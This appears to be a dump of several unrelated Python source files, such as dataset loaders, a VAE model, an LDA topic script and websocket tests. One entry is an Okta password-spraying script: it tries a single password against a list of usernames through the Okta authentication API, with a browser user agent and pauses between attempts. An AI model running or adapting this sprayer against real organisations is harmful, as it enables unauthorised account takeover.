id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
1688770
|
from bitmovin.errors import InvalidTypeError
from bitmovin.resources import AbstractNameDescriptionResource
from bitmovin.resources.models import AbstractModel
from bitmovin.utils import Serializable
from .concatenation_input_stream_configuration import ConcatenationInputStreamConfiguration
class ConcatenationInputStream(AbstractNameDescriptionResource, AbstractModel, Serializable):
    """Input stream that concatenates multiple configured input streams."""

    def __init__(self, concatenation, id_=None, custom_data=None, name=None, description=None):
        """
        :param concatenation: list of ConcatenationInputStreamConfiguration
            objects (or raw JSON dicts that parse into them), or None
        :raises InvalidTypeError: if concatenation is neither None nor a list
        """
        super().__init__(id_=id_, custom_data=custom_data, name=name, description=description)
        self._concatenation = None
        if concatenation is not None and not isinstance(concatenation, list):
            raise InvalidTypeError('concatenation must be a list')
        self.concatenation = concatenation

    @property
    def concatenation(self):
        return self._concatenation

    @concatenation.setter
    def concatenation(self, new_concatenations):
        if new_concatenations is None:
            self._concatenation = None
            # BUG FIX: previously fell through to the all(...) check below and
            # iterated over None, raising TypeError instead of accepting None.
            return
        if not isinstance(new_concatenations, list):
            raise InvalidTypeError(
                'new_concatenation has to be a list of ConcatenationInputStreamConfiguration objects'
            )
        if all(isinstance(concatenation, ConcatenationInputStreamConfiguration)
               for concatenation in new_concatenations):
            self._concatenation = new_concatenations
        else:
            # Entries are raw JSON dicts: parse each into a configuration object.
            self._concatenation = [
                ConcatenationInputStreamConfiguration.parse_from_json_object(json_object=json_object)
                for json_object in new_concatenations
            ]

    @classmethod
    def parse_from_json_object(cls, json_object):
        """Build an instance from an API JSON dict (uses cls so subclasses work)."""
        return cls(
            concatenation=json_object.get('concatenation'),
            id_=json_object.get('id'),
            custom_data=json_object.get('customData'),
            name=json_object.get('name'),
            description=json_object.get('description')
        )

    def serialize(self):
        serialized = super().serialize()
        serialized['concatenation'] = self.concatenation
        return serialized
|
1688790
|
# Romanization table for a run of 256 consecutive Hangul syllables
# (appears to be the U+C800.. block, 'jeo' onward -- TODO confirm).
# In Unicode codepoint order each stem (onset+vowel) is followed by the 28
# possible coda (final consonant) romanizations.
_FINALS = (
    '', 'g', 'gg', 'gs', 'n', 'nj', 'nh', 'd', 'l', 'lg', 'lm', 'lb', 'ls',
    'lt', 'lp', 'lh', 'm', 'b', 'bs', 's', 'ss', 'ng', 'j', 'c', 'k', 't',
    'p', 'h',
)
_STEMS = ('jeo', 'je', 'jyeo', 'jye', 'jo', 'jwa', 'jwae', 'joe', 'jyo', 'ju')
# 9 full stems x 28 finals = 252 entries, then the first 4 'ju' forms = 256.
data = tuple(stem + final for stem in _STEMS for final in _FINALS)[:256]
|
1688798
|
from chainercv.datasets.coco.coco_instances_base_dataset import \
COCOInstancesBaseDataset
class COCOBboxDataset(COCOInstancesBaseDataset):
    """Bounding box dataset for `MS COCO`_.

    .. _`MS COCO`: http://cocodataset.org/#home

    Args:
        data_dir (string): Path to the root of the training data. If this is
            :obj:`auto`, this class will automatically download data for you
            under :obj:`$CHAINER_DATASET_ROOT/pfnet/chainercv/coco`.
        split ({'train', 'val', 'minival', 'valminusminival'}): Select
            a split of the dataset.
        year ({'2014', '2017'}): Use a dataset released in :obj:`year`.
            Splits :obj:`minival` and :obj:`valminusminival` are only
            supported in year :obj:`2014`.
        use_crowded (bool): If true, use bounding boxes that are labeled as
            crowded in the original annotation. The default value is
            :obj:`False`.
        return_area (bool): If true, this dataset returns areas of masks
            around objects. The default value is :obj:`False`.
        return_crowded (bool): If true, this dataset returns a boolean array
            that indicates whether bounding boxes are labeled as crowded
            or not. The default value is :obj:`False`.

    This dataset returns the following data.

    .. csv-table::
        :header: name, shape, dtype, format

        :obj:`img`, ":math:`(3, H, W)`", :obj:`float32`, \
        "RGB, :math:`[0, 255]`"
        :obj:`bbox` [#coco_bbox_1]_, ":math:`(R, 4)`", :obj:`float32`, \
        ":math:`(y_{min}, x_{min}, y_{max}, x_{max})`"
        :obj:`label` [#coco_bbox_1]_, ":math:`(R,)`", :obj:`int32`, \
        ":math:`[0, \#fg\_class - 1]`"
        :obj:`area` [#coco_bbox_1]_ [#coco_bbox_2]_, ":math:`(R,)`", \
        :obj:`float32`, --
        :obj:`crowded` [#coco_bbox_3]_, ":math:`(R,)`", :obj:`bool`, --

    .. [#coco_bbox_1] If :obj:`use_crowded = True`, :obj:`bbox`, \
        :obj:`label` and :obj:`area` contain crowded instances.
    .. [#coco_bbox_2] :obj:`area` is available \
        if :obj:`return_area = True`.
    .. [#coco_bbox_3] :obj:`crowded` is available \
        if :obj:`return_crowded = True`.

    When there are more than ten objects from the same category,
    bounding boxes correspond to crowd of instances instead of individual
    instances. Please see more detail in the Fig. 12 (e) of the summary
    paper [#]_.

    .. [#] `Microsoft COCO: Common Objects in Context \
        <https://arxiv.org/abs/1405.0312>`_. arXiv 2014.
    """

    def __init__(self, data_dir='auto', split='train', year='2017',
                 use_crowded=False, return_area=False, return_crowded=False):
        super(COCOBboxDataset, self).__init__(
            data_dir, split, year, use_crowded)
        # Base keys, extended with optional fields depending on the flags.
        selected = ['img', 'bbox', 'label']
        if return_area:
            selected.append('area')
        if return_crowded:
            selected.append('crowded')
        self.keys = tuple(selected)
|
1688838
|
import os
import numpy as np
import copy
from PIL import Image, ImageDraw
from collections.abc import Sequence
from paddle.io import Dataset
from data.operators import *
from eval_model import get_categories, get_infer_results
class ImageFolder(Dataset):
    """Inference-time dataset over loose image files.

    Builds minimal records (``{'im_id', 'im_file'}``) from an image directory,
    an explicit list of paths, or a single file -- no annotations required.
    """

    def __init__(self,
                 dataset_dir=None,
                 image_dir=None,
                 anno_path=None,
                 data_fields=['image'],
                 sample_num=-1,
                 use_default_label=None,
                 **kwargs):
        super(ImageFolder, self).__init__()
        self.dataset_dir = dataset_dir if dataset_dir is not None else ''
        self.anno_path = anno_path
        self.image_dir = image_dir if image_dir is not None else ''
        self.data_fields = data_fields
        self.sample_num = sample_num  # max number of samples to load (-1 = all)
        self.use_default_label = use_default_label
        self._epoch = 0
        self._curr_iter = 0
        self._imid2path = {}
        self.roidbs = None
        # BUG FIX: __getitem__ reads these attributes, but they previously
        # existed only after set_kwargs() was called (AttributeError
        # otherwise). -1 disables the corresponding augmentation.
        # (Also removed a duplicate self.sample_num assignment.)
        self.mixup_epoch = kwargs.get('mixup_epoch', -1)
        self.cutmix_epoch = kwargs.get('cutmix_epoch', -1)
        self.mosaic_epoch = kwargs.get('mosaic_epoch', -1)

    def __len__(self):
        return len(self.roidbs)

    def __getitem__(self, idx):
        # Build one (possibly multi-image) record for the transform pipeline.
        roidb = copy.deepcopy(self.roidbs[idx])
        if self.mixup_epoch == 0 or self._epoch < self.mixup_epoch:
            # mixup: pair the record with one random record
            n = len(self.roidbs)
            idx = np.random.randint(n)
            roidb = [roidb, copy.deepcopy(self.roidbs[idx])]
        elif self.cutmix_epoch == 0 or self._epoch < self.cutmix_epoch:
            # cutmix: pair the record with one random record
            n = len(self.roidbs)
            idx = np.random.randint(n)
            roidb = [roidb, copy.deepcopy(self.roidbs[idx])]
        elif self.mosaic_epoch == 0 or self._epoch < self.mosaic_epoch:
            # mosaic: group the record with three random records
            n = len(self.roidbs)
            roidb = [roidb, ] + [
                copy.deepcopy(self.roidbs[np.random.randint(n)])
                for _ in range(3)
            ]
        if isinstance(roidb, Sequence):
            for r in roidb:
                r['curr_iter'] = self._curr_iter
        else:
            roidb['curr_iter'] = self._curr_iter
        self._curr_iter += 1
        return self.transform(roidb)

    def check_or_download_dataset(self):
        # Nothing to download for plain image folders.
        return

    def set_kwargs(self, **kwargs):
        self.mixup_epoch = kwargs.get('mixup_epoch', -1)
        self.cutmix_epoch = kwargs.get('cutmix_epoch', -1)
        self.mosaic_epoch = kwargs.get('mosaic_epoch', -1)

    def set_transform(self, transform):
        self.transform = transform

    def set_epoch(self, epoch_id):
        self._epoch = epoch_id

    def parse_dataset(self):
        if not self.roidbs:
            self.roidbs = self._load_images()

    def get_anno(self):
        """Full path of the annotation file, or None when not configured."""
        if self.anno_path is None:
            return
        return os.path.join(self.dataset_dir, self.anno_path)

    def _parse(self):
        """Expand image_dir (a directory, a file, or a list of either) into
        a flat list of image file paths."""
        image_dir = self.image_dir
        # BUG FIX: str is itself a Sequence, so a plain-string image_dir used
        # to be iterated character by character; wrap strings explicitly.
        if isinstance(image_dir, str) or not isinstance(image_dir, Sequence):
            image_dir = [image_dir]
        images = []
        for im_dir in image_dir:
            # BUG FIX: resolve against dataset_dir *before* the isdir/isfile
            # checks; previously a relative directory was tested unjoined.
            im_path = os.path.join(self.dataset_dir, im_dir)
            if os.path.isdir(im_path):
                images.extend(_make_dataset(im_path))
            elif os.path.isfile(im_path) and _is_valid_file(im_path):
                images.append(im_path)
        return images

    def _load_images(self):
        """Build roidb records ({'im_id', 'im_file'}) from the parsed paths."""
        images = self._parse()
        ct = 0
        records = []
        for image in images:
            assert image != '' and os.path.isfile(image), \
                "Image {} not found".format(image)
            if self.sample_num > 0 and ct >= self.sample_num:
                break
            rec = {'im_id': np.array([ct]), 'im_file': image}
            self._imid2path[ct] = image
            ct += 1
            records.append(rec)
        assert len(records) > 0, "No image file found"
        return records

    def get_imid2path(self):
        return self._imid2path

    def set_images(self, images):
        """Point the dataset at an explicit list of image paths and reload."""
        self.image_dir = images
        self.roidbs = self._load_images()
def _is_valid_file(f, extensions=('.jpg', '.jpeg', '.png', '.bmp')):
return f.lower().endswith(extensions)
def _make_dataset(dir):
dir = os.path.expanduser(dir)
if not os.path.isdir(dir):
raise ('{} should be a dir'.format(dir))
images = []
for root, _, fnames in sorted(os.walk(dir, followlinks=True)):
for fname in sorted(fnames):
path = os.path.join(root, fname)
if _is_valid_file(path):
images.append(path)
return images
def draw_bbox(image, bbox_res, im_id, catid2name, threshold=0.5):
    """Draw detection boxes and class labels onto a PIL image.

    Args:
        image: PIL image to draw on (modified in place and returned).
        bbox_res: iterable of COCO-style detection dicts with keys
            'image_id', 'category_id', 'bbox' ([x, y, w, h]) and 'score'.
        im_id: only detections whose 'image_id' equals this value are drawn.
        catid2name: mapping of category id -> human-readable class name.
        threshold: detections scoring below this value are skipped.

    Returns:
        The same image object with boxes and labels drawn.
    """
    draw = ImageDraw.Draw(image)
    catid2color = {}
    # One random color per category, sampled from the first 40 colormap rows.
    color_list = colormap(rgb=True)[:40]
    for dt in np.array(bbox_res):
        if im_id != dt['image_id']:
            continue
        catid, bbox, score = dt['category_id'], dt['bbox'], dt['score']
        if score < threshold:
            continue
        if catid not in catid2color:
            idx = np.random.randint(len(color_list))
            catid2color[catid] = color_list[idx]
        color = tuple(catid2color[catid])
        # draw bbox: COCO boxes are [xmin, ymin, width, height]
        xmin, ymin, w, h = bbox
        xmax = xmin + w
        ymax = ymin + h
        draw.line(
            [(xmin, ymin), (xmin, ymax), (xmax, ymax), (xmax, ymin),
             (xmin, ymin)],
            width=2,
            fill=color)
        # draw label just above the top-left corner of the box
        # NOTE(review): ImageDraw.textsize was removed in Pillow 10 --
        # presumably this targets an older Pillow; confirm before upgrading.
        text = "{} {:.2f}".format(catid2name[catid], score)
        tw, th = draw.textsize(text)
        draw.rectangle(
            [(xmin + 1, ymin - th), (xmin + tw + 1, ymin)], fill=color)
        draw.text((xmin + 1, ymin - th), text, fill=(255, 255, 255))
    return image
def colormap(rgb=False):
    """Return an (N, 3) float32 palette of distinct colors scaled to [0, 255].

    Args:
        rgb: when True the rows are RGB; otherwise they are returned in BGR
            channel order (OpenCV convention).
    """
    values = np.array([
        0.000, 0.447, 0.741, 0.850, 0.325, 0.098, 0.929, 0.694, 0.125, 0.494,
        0.184, 0.556, 0.466, 0.674, 0.188, 0.301, 0.745, 0.933, 0.635, 0.078,
        0.184, 0.300, 0.300, 0.300, 0.600, 0.600, 0.600, 1.000, 0.000, 0.000,
        1.000, 0.500, 0.000, 0.749, 0.749, 0.000, 0.000, 1.000, 0.000, 0.000,
        0.000, 1.000, 0.667, 0.000, 1.000, 0.333, 0.333, 0.000, 0.333, 0.667,
        0.000, 0.333, 1.000, 0.000, 0.667, 0.333, 0.000, 0.667, 0.667, 0.000,
        0.667, 1.000, 0.000, 1.000, 0.333, 0.000, 1.000, 0.667, 0.000, 1.000,
        1.000, 0.000, 0.000, 0.333, 0.500, 0.000, 0.667, 0.500, 0.000, 1.000,
        0.500, 0.333, 0.000, 0.500, 0.333, 0.333, 0.500, 0.333, 0.667, 0.500,
        0.333, 1.000, 0.500, 0.667, 0.000, 0.500, 0.667, 0.333, 0.500, 0.667,
        0.667, 0.500, 0.667, 1.000, 0.500, 1.000, 0.000, 0.500, 1.000, 0.333,
        0.500, 1.000, 0.667, 0.500, 1.000, 1.000, 0.500, 0.000, 0.333, 1.000,
        0.000, 0.667, 1.000, 0.000, 1.000, 1.000, 0.333, 0.000, 1.000, 0.333,
        0.333, 1.000, 0.333, 0.667, 1.000, 0.333, 1.000, 1.000, 0.667, 0.000,
        1.000, 0.667, 0.333, 1.000, 0.667, 0.667, 1.000, 0.667, 1.000, 1.000,
        1.000, 0.000, 1.000, 1.000, 0.333, 1.000, 1.000, 0.667, 1.000, 0.167,
        0.000, 0.000, 0.333, 0.000, 0.000, 0.500, 0.000, 0.000, 0.667, 0.000,
        0.000, 0.833, 0.000, 0.000, 1.000, 0.000, 0.000, 0.000, 0.167, 0.000,
        0.000, 0.333, 0.000, 0.000, 0.500, 0.000, 0.000, 0.667, 0.000, 0.000,
        0.833, 0.000, 0.000, 1.000, 0.000, 0.000, 0.000, 0.167, 0.000, 0.000,
        0.333, 0.000, 0.000, 0.500, 0.000, 0.000, 0.667, 0.000, 0.000, 0.833,
        0.000, 0.000, 1.000, 0.000, 0.000, 0.000, 0.143, 0.143, 0.143, 0.286,
        0.286, 0.286, 0.429, 0.429, 0.429, 0.571, 0.571, 0.571, 0.714, 0.714,
        0.714, 0.857, 0.857, 0.857, 1.000, 1.000, 1.000
    ]).astype(np.float32)
    palette = values.reshape((-1, 3)) * 255
    return palette if rgb else palette[:, ::-1]
def predict(images,
            model,
            draw_threshold=0.5,
            output_dir='output',
            anno_path=None):
    """Run detection inference over a list of image paths and save annotated
    copies of each image under *output_dir*.

    Args:
        images: list of image file paths to run through the model.
        model: detection model; called as ``model(data)`` and expected to
            return a dict containing 'bbox_num' (and usually 'bbox') outputs.
        draw_threshold: score threshold below which boxes are not drawn.
        output_dir: directory where annotated images are written.
        anno_path: optional annotation file used to map category ids to names.
    """
    status = {}
    dataset = ImageFolder(anno_path=anno_path)
    dataset.set_images(images)
    # Standard test-time pipeline: decode -> resize -> normalize -> CHW layout.
    sample_transforms = [{Decode: {}}, {Resize: {'target_size': [800, 1333], 'keep_ratio': True}}, {NormalizeImage: {'is_scale': True, 'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}}, {Permute: {}}]
    batch_transforms = [{PadMaskBatch: {'pad_to_stride': -1, 'return_pad_mask': True}}]
    # NOTE(review): BaseDataLoader is not imported by name in this file --
    # presumably it arrives via ``from data.operators import *``; verify.
    loader = BaseDataLoader(sample_transforms, batch_transforms, batch_size=1, shuffle=False, drop_last=False)(dataset, 0)
    imid2path = dataset.get_imid2path()
    anno_file = dataset.get_anno()
    clsid2catid, catid2name = get_categories('COCO', anno_file=anno_file)
    # Run Infer
    status['mode'] = 'test'
    model.eval()
    for step_id, data in enumerate(loader):
        status['step_id'] = step_id
        # forward
        outs = model(data)
        # Carry image metadata through so results can be mapped back to files.
        for key in ['im_shape', 'scale_factor', 'im_id']:
            outs[key] = data[key]
        # Convert any tensor outputs to numpy arrays.
        for key, value in outs.items():
            if hasattr(value, 'numpy'):
                outs[key] = value.numpy()
        batch_res = get_infer_results(outs, clsid2catid)
        bbox_num = outs['bbox_num']
        start = 0
        # The bbox list is flat across the batch; bbox_num[i] boxes per image.
        for i, im_id in enumerate(outs['im_id']):
            image_path = imid2path[int(im_id)]
            image = Image.open(image_path).convert('RGB')
            status['original_image'] = np.array(image.copy())
            end = start + bbox_num[i]
            bbox_res = batch_res['bbox'][start:end] if 'bbox' in batch_res else None
            if bbox_res is not None:
                image = draw_bbox(image, bbox_res, int(im_id), catid2name, draw_threshold)
            status['result_image'] = np.array(image.copy())
            # save image with detection
            if not os.path.exists(output_dir):
                os.makedirs(output_dir)
            image_name = os.path.split(image_path)[-1]
            name, ext = os.path.splitext(image_name)
            save_name = os.path.join(output_dir, "{}".format(name)) + ext
            print("Detection bbox results save in {}".format(save_name))
            image.save(save_name, quality=95)
            start = end
def get_test_images(infer_img, infer_dir=None):
    """Get image path list in TEST mode.

    Args:
        infer_img: a single image file path; takes priority when both are set.
        infer_dir: a directory scanned (non-recursively) for jpg/jpeg/png/bmp
            files in either case.

    Returns:
        list[str]: image paths (de-duplicated, unordered for the dir case).
    """
    # BUG FIX: ``glob`` was used below but never imported anywhere in this
    # file, raising NameError; import it locally.
    import glob

    assert infer_img is not None or infer_dir is not None, \
        "--infer_img or --infer_dir should be set"
    assert infer_img is None or os.path.isfile(infer_img), \
        "{} is not a file".format(infer_img)
    assert infer_dir is None or os.path.isdir(infer_dir), \
        "{} is not a directory".format(infer_dir)
    # infer_img has a higher priority
    if infer_img and os.path.isfile(infer_img):
        return [infer_img]
    images = set()
    infer_dir = os.path.abspath(infer_dir)
    # Match both lower- and upper-case extensions.
    exts = ['jpg', 'jpeg', 'png', 'bmp']
    exts += [ext.upper() for ext in exts]
    for ext in exts:
        images.update(glob.glob('{}/*.{}'.format(infer_dir, ext)))
    images = list(images)
    assert len(images) > 0, "no image found in {}".format(infer_dir)
    print("Found {} inference images in total.".format(len(images)))
    return images
|
1688874
|
import requests
from requests.auth import HTTPBasicAuth
from optparse import OptionParser
import sys
import time
if ((len(sys.argv) < 9 or len(sys.argv) > 9) and '-h' not in sys.argv):
print("Usage:")
print("python3 %s -p <password> -f <inputfile> -d <domain> -w <wait_time>" % sys.argv[0])
sys.exit(1)
parser = OptionParser()
parser.add_option("-p", "--password", help="Password to spray with")
parser.add_option("-f", "--inputfile", help="File with usernames")
parser.add_option("-d", "--domain", help="Company domain")
parser.add_option("-w", "--wait", help="Seconds to wait between each spray attempt")
(options, args) = parser.parse_args()
domain = options.domain.partition('.')
domain2 = domain[0]
sleeptime = int(options.wait)
oktadomain = '%s.okta.com' % domain2
url = 'https://%s/api/v1/authn' % oktadomain
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
print("+"*100)
print("Okta Password Sprayer")
print("+"*100)
password = <PASSWORD>.password.strip()
print("Spraying...with a wait time of %s..." % options.wait)
with open ("%s" % options.inputfile, "r") as oktausers:
for line in oktausers:
try:
usr = line.strip()
data = {"username":"{}".format(usr),"options":{"warnBeforePasswordExpired":"true","multiOptionalFactorEnroll":"true"},"password":"{}".<PASSWORD>(password)}
print("--Waiting %s seconds..." % options.wait)
time.sleep(sleeptime)
response = requests.post(url, headers=headers, json=data)
if response.status_code == 200:
print("\033[92mlogin successful - %s:%s\033[0m" % (usr, password))
print("\033[1mOkta Response Info:\033[0m")
print(response.text)
response.close()
else:
print("\033[91mAuthentication failed - %s:%s\033[0m" % (usr, password))
except Exception as e:
print(e)
|
1688892
|
import torch
from torch.nn import functional as F
from torch.autograd import Variable
import torch.nn as nn
import math
import numpy as np
from ..config import eps
class ConvBlock4(torch.nn.Module):
    """Conv2d -> BatchNorm2d -> LeakyReLU block with Xavier-initialized
    convolution weights (gain matched to the leaky-relu nonlinearity)."""

    def __init__(self, inpt_kernel, output_kernel, kernel_size=4, stride=1, padding=0):
        super().__init__()
        self.conv = nn.Conv2d(
            in_channels=inpt_kernel,
            out_channels=output_kernel,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding)
        self.bn = nn.BatchNorm2d(output_kernel)
        self.act = nn.LeakyReLU(inplace=True)
        nn.init.xavier_uniform_(
            self.conv.weight, gain=nn.init.calculate_gain('leaky_relu'))

    def forward(self, x):
        # convolution -> batch normalization -> activation
        return self.act(self.bn(self.conv(x)))
class DeconvBlock4(torch.nn.Module):
    """ConvTranspose2d -> BatchNorm2d -> LeakyReLU block with
    Xavier-initialized weights (gain matched to the leaky-relu nonlinearity)."""

    def __init__(self, inpt_kernel, output_kernel, kernel_size=4, stride=1, padding=0):
        super().__init__()
        self.deconv = nn.ConvTranspose2d(
            in_channels=inpt_kernel,
            out_channels=output_kernel,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding)
        self.bn = nn.BatchNorm2d(output_kernel)
        self.act = nn.LeakyReLU(inplace=True)
        nn.init.xavier_uniform_(
            self.deconv.weight, gain=nn.init.calculate_gain('leaky_relu'))

    def forward(self, x):
        # transposed convolution -> batch normalization -> activation
        return self.act(self.bn(self.deconv(x)))
class VAE5(nn.Module):
    """VAE. Vector Quantised Variational Auto-Encoder.

    Refs:
    - https://github.com/nakosung/VQ-VAE/blob/master/model.py
    - https://github.com/JunhongXu/world-models-pytorch/blob/master/vae.py
    """

    def __init__(self, image_size=64, z_dim=32, conv_dim=64, code_dim=16, k_dim=256, channels=3):
        """
        Args:
        - image_size (int) height and width of the (square) input image
        - conv_dim (int) output channels of the first conv layer (later layers are multiples)
        - z_dim (int) channels in the encoded feature map
        - code_dim (int) height and width of the encoded feature map
        - k_dim (int) dimensionality of the latent vector
        - channels (int) input/output image channels
        """
        super().__init__()
        self.k_dim = k_dim
        self.z_dim = z_dim
        self.code_dim = code_dim
        hidden_size = z_dim * code_dim * code_dim
        latent_vector_dim = k_dim
        # Heads mapping the flattened encoder output to the latent Gaussian,
        # and back from the latent vector to the decoder input.
        self.logvar = nn.Linear(hidden_size, latent_vector_dim)
        self.mu = nn.Linear(hidden_size, latent_vector_dim)
        self.z = nn.Linear(latent_vector_dim, hidden_size)
        nn.init.xavier_uniform_(self.logvar.weight)
        nn.init.xavier_uniform_(self.mu.weight)
        nn.init.xavier_uniform_(self.z.weight)
        # Encoder (channel count grows linearly with depth)
        layers = []
        layers.append(ConvBlock4(channels, conv_dim, kernel_size=3, padding=1))
        repeat_num = int(math.log2(image_size / code_dim))
        curr_dim = conv_dim
        for i in range(repeat_num):
            layers.append(ConvBlock4(curr_dim, conv_dim * (i + 2), kernel_size=4, stride=2, padding=1))
            curr_dim = conv_dim * (i + 2)
        # Now we have (code_dim, code_dim, curr_dim); project to z_dim channels.
        layers.append(nn.Conv2d(curr_dim, z_dim, kernel_size=1))
        # (code_dim, code_dim, z_dim)
        self.encoder = nn.Sequential(*layers)
        # Decoder (mirrors the encoder with shrinking channel counts)
        layers = []
        layers.append(DeconvBlock4(z_dim, curr_dim, kernel_size=1))
        for i in reversed(range(repeat_num)):
            layers.append(DeconvBlock4(curr_dim, conv_dim * (i + 1), kernel_size=4, stride=2, padding=1))
            curr_dim = conv_dim * (i + 1)
        layers.append(nn.Conv2d(curr_dim, channels, kernel_size=3, padding=1))
        self.decoder = nn.Sequential(*layers)
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        """Returns reconstructed image, mean, and log variance."""
        mu, logvar = self.encode(x)
        z = self.sample(mu, logvar)
        x = self.decode(z)
        return x, mu, logvar

    def encode(self, x):
        """Returns mean and log variance, which describe the distributions of Z."""
        x = self.encoder(x)
        x = x.view(x.size()[0], -1)
        # Clamp logvar for numerical stability (``eps`` comes from ..config).
        return self.mu(x), self.logvar(x).clamp(np.log(eps), -np.log(eps))

    def decode(self, z):
        """Reconstruct image X using z sampled from Z."""
        z = self.z(z)
        n, d = z.size()
        z = z.view(n, -1, self.code_dim, self.code_dim)
        reconstruction = self.decoder(z)
        reconstruction = self.sigmoid(reconstruction)
        return reconstruction

    def sample(self, mu, logvar):
        """Sample z ~ N(mu, sigma^2) with the reparameterization trick.

        BUG FIX: std is exp(0.5 * logvar), not exp(logvar) -- the old code
        used the log-variance as if it were the log standard deviation,
        inconsistent with the KL term in loss_function_vae. Also replaces the
        deprecated ``Variable``/``.data.new`` idiom with ``torch.randn_like``.
        """
        if self.training:
            std = (0.5 * logvar).exp()
            return mu + std * torch.randn_like(std)
        # At evaluation time, return the distribution mean deterministically.
        return mu

    def loss(self, *args, **kwargs):
        return loss_function_vae(*args, **kwargs)
def loss_function_vae(recon_x, x, mu, logvar):
    """Per-sample VAE loss terms: summed-L2 reconstruction and KL divergence.

    Args:
        recon_x: reconstructed batch, shape (N, C, H, W).
        x: target batch, same shape as recon_x.
        mu, logvar: latent Gaussian parameters, shape (N, K).

    Returns:
        (loss_recon, loss_KLD): two tensors of shape (N,).
    """
    # Reconstruction + KL divergence losses summed over all elements, per sample
    # https://github.com/pytorch/examples/blob/master/vae/main.py
    n = recon_x.size(0)
    recon_x = recon_x.view(n, -1)
    x = x.view(n, -1)
    # L2 distance summed per sample. BUG FIX: ``reduce=False`` is deprecated;
    # ``reduction='none'`` is the supported equivalent. Argument order is
    # (input, target); MSE is symmetric so the value is unchanged.
    loss_recon = F.mse_loss(recon_x, x, reduction='none').sum(1)
    # see Appendix B of the VAE paper:
    # Kingma & Welling. Auto-Encoding Variational Bayes. ICLR, 2014
    # https://arxiv.org/abs/1312.6114
    # -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
    loss_KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)
    return loss_recon, loss_KLD
|
1688893
|
import csv
import ipdb
import logging
from operator import itemgetter
from gensim import corpora, models
from gensim.utils import lemmatize
from gensim.parsing.preprocessing import STOPWORDS
from gensim.models.coherencemodel import CoherenceModel
import gensim
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)

# Load the audit documents; each well-formed row has 4 columns with the body
# text in column index 2.
print("Reading input file 'input/audits_with_content.csv'")
with open('input/audits_with_content.csv', 'r') as f:
    reader = csv.reader(f)
    documents = list(reader)

print("Remove documents without body")
all_docs = [doc for doc in documents if len(doc) == 4 and doc[2] != '']
documents = [doc[2] for doc in documents if len(doc) == 4 and doc[2] != '']
doc_count = len(documents)

# list for tokenized documents in loop
texts = []
print("Generating lemmas for each of the documents")
for document in documents:
    # clean and lemmatize document string
    raw = document.lower()
    tokens = lemmatize(raw, stopwords=STOPWORDS)
    texts.append(tokens)

print("Turn our tokenized documents into a id <-> term dictionary")
dictionary = corpora.Dictionary(texts)

print("Convert tokenized documents into a document-term matrix")
corpus = [dictionary.doc2bow(text) for text in texts]

print("Generate LDA model")
ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=10, id2word=dictionary, passes=50)

# BUG FIX: write output files through context managers so they are always
# flushed and closed, even if an intermediate step raises; also fixed the
# "Writting" typo in the progress message.
print("Writing topics to file")
with open('output/gensim_topics.txt', 'w') as topics_file:
    topics_list = ldamodel.print_topics(num_topics=10, num_words=5)
    topics_string = ['Topic {}: {}'.format(i, topic) for i, topic in topics_list]
    topics_file.write("\n".join(topics_string))

print("Writing tagged docs to file")
with open('output/tagged_data.txt', 'w') as tagged_documents_file:
    for index, document in enumerate(documents):
        raw = document.lower()
        doc_tokens = lemmatize(raw, stopwords=STOPWORDS)
        doc_bow = dictionary.doc2bow(doc_tokens)
        result = ldamodel[doc_bow]
        # Tag each document with its highest-probability topic.
        tag = max(result, key=itemgetter(1))[0]
        tag_string = 'Document {} on {}: Tagged with topic {}\n'.format(index + 1, all_docs[index][0], str(tag))
        tagged_documents_file.write(tag_string)
|
1688917
|
from loguetools import xd
def test_translate_step_data():
    # Feed 20 bytes of original-format step data through the translator and
    # compare against the hand-computed expanded layout.
    raw_hex = "00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 20 30 40"
    translated = xd.fn_translate_step_data(bytes.fromhex(raw_hex.replace(' ', '')))
    expected_hex = (
        '00 01 02 03 00 00 00 00 04 05 06 07 00 00 00 00 08 09 0a 0b 00 00 00 00 0c 0d 00 00 ' + \
        '00 00 00 0e 0f 00 00 00 00 00 10 20 00 00 00 00 00 30 40 00 00 00 00 00'
    )
    assert translated == bytes.fromhex(expected_hex.replace(' ', ''))
|
1688920
|
import os
def pre_process(data_path):
    """Return the path unchanged together with its bare file name
    (no directory, truncated at the first dot)."""
    base_name = os.path.basename(data_path)
    return data_path, base_name.partition('.')[0]
|
1688934
|
import json
import asyncio
import pytest
from model_mommy import mommy
from aiohttp import ws_connect, WSServerHandshakeError
from aiohttp.web import Application, MsgType
from rest_framework.authtoken.models import Token
from redis_pubsub.contrib.websockets import websocket, websocket_pubsub
from redis_pubsub.contrib.websockets.util import _clean_route
from testapp.models import Message
@pytest.mark.parametrize("route, expect", [
    ("/hello", "/hello/"),
    ("hello", "/hello/"),
    ("hello/world", "/hello/world/"),
    ("/hello/world/", "/hello/world/"),
])
def test_clean_route(route, expect):
    # _clean_route must normalize to a leading and trailing slash.
    assert _clean_route(route) == expect
def test_websocket_wrapper():
    # End-to-end check of the @websocket decorator: serve a one-shot handler
    # and assert the client receives the greeting it sends.
    # NOTE(review): written against a legacy aiohttp API (module-level
    # ws_connect, generator-based coroutines) -- presumably pinned to an old
    # aiohttp release; confirm before upgrading.
    loop = asyncio.get_event_loop()

    @websocket("/")
    def handler(ws, params, **kwargs):
        ws.send_str("hello, world!")

    @asyncio.coroutine
    def start_server(loop):
        # Mount the wrapped handler's route tuple and serve on a fixed port.
        app = Application()
        app.router.add_route(*handler.route)
        srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
        return srv

    @asyncio.coroutine
    def go(loop):
        srv = yield from start_server(loop)
        client = yield from ws_connect("http://localhost:9000")
        message = yield from client.receive()
        assert message.data == "hello, world!"
        yield from client.close()
        srv.close()
        yield from srv.wait_closed()

    loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_pubsub_wrapper(subscription):
